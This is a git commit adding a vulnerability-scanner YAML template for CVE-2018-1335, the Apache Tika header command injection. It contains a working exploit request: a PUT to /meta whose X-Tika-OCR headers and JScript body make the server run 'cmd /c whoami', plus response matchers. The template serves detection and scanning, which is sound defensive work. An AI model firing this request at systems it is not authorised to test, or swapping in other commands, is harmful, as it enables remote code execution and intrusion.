Merge pull request #976 from pikpikcu/patch-93

Add CVE-2018-1335 Apache Tika Header Command Injection
2021-02-27 17:18:23 +05:30 · 2021-02-27 17:18:23 +05:30 · 3cafcd89e0
parent bfe822b37b c59c99a92e
commit 3cafcd89e0
1 changed files with 40 additions and 0 deletions
--- a/cves/2018/CVE-2018-1335.yaml
+++ b/cves/2018/CVE-2018-1335.yaml
@ -0,0 +1,40 @@
+id: CVE-2018-1335
+
+info:
+  name: Apache Tika 1.15-1.17 Header Command Injection
+  author: pikpikcu
+  severity: critical
+  reference: https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/
+  edb: https://www.exploit-db.com/exploits/47208
+  tags: cve,cve2018,apache,tika,rce
+
+requests:
+  - method: PUT
+    path:
+      - "{{BaseURL}}/meta"
+    headers:
+      X-Tika-OCRTesseractPath: cscript
+      X-Tika-OCRLanguage: //E:Jscript
+      Expect: 100-continue
+      Content-type: image/jp2
+      Connection: close
+    body: "var oShell = WScript.CreateObject('WScript.Shell');var oExec = oShell.Exec(\"cmd /c whoami\");"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - "Content-Type: text/csv"
+        part: header
+
+      - type: word
+        words:
+          - "org.apache.tika.parser.DefaultParser"
+          - "org.apache.tika.parser.gdal.GDALParse"
+        part: body
+        condition: and
+
+      - type: status
+        status:
+          - 200